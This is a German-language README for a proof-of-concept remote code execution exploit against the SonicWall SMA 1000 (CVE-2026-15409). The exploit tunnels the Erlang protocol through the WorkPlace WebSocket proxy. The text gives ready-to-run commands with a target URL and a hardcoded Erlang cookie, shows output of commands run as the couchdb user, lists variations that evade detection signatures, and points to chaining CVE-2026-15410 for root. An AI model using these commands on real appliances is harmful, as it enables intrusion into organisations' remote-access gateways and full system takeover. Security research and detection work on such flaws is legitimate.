CVE-2026-15409
Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2026-15409. Er ermöglicht Remote-Codeausführung ohne Root-Rechte auf SonicWall SMA 1000, indem er das von localhost:1050 erwartete Erlang-Protokoll implementiert und es über den WebSocket tunnelt, um Datei-Lesen/-Schreiben und beliebige Codeausführung über RPC-Aufrufe zu ermöglichen.
Verwendung
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma
Hinweise zur Ausnutzung und Erkennung
- Dieser Exploit zielt auf den WorkPlace-Dienst (der normalerweise auf Port 443 lauscht), der höchstwahrscheinlich fast immer aktiviert ist (erfordert die Einrichtung einer Benutzer-Authentifizierungsmethode wie Basic-AD)
- Entwickelt gegen ex_sra_vm_12.5.0-02002.ova mit angewendetem Hotfix vom Juni 2026 (letzter vor dem Patch)
- Beispiel: python3 cve-2026-15409.py --ws-url 'wss://TARGET_IP_HERE/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'touch /var/tmp/remote_code_execution'
- Das für die Ausnutzung verwendete Erlang-Node-Cookie sollte über alle Ziele hinweg konsistent sein; es ist basierend auf Tests für den Erlang-Prozess auf localhost:1050 hartkodiert.
- Beliebige bmID-Werte sollten im Allgemeinen funktionieren, solange der Wert mit "-3389" beginnt. Schreibe keine Signaturen gegen "serviceType=SSH", da es Alternativen wie TELNET gibt, die ebenfalls funktionieren. 0.0.0.0 kann ebenfalls durch alternative Adressformate ersetzt werden.
- Port 1050 ist eine Ausnutzungstechnik, keine fest codierte Anforderung für die Ausnutzung. EITW wurde ebenfalls dabei beobachtet, Port 8188 anzugreifen, auch wenn es einfacher zu sein scheint, einfach 1050 zu verwenden. Es gibt möglicherweise auch andere Dienste auf verschiedenen Ports, die ausgenutzt werden können. Codeausführung in der Praxis wird wahrscheinlich in anderen Benutzerkontexten als couchdb stattfinden, abhängig von der Variation der verwendeten Techniken.
- Sobald eine Shell etabliert ist, kann der Angreifer mit dem "remove hotfix"-XMLRPC-Traversal-Exploit CVE-2026-15410 (der auf localhost:8188 abzielt) Root-Rechte erlangen.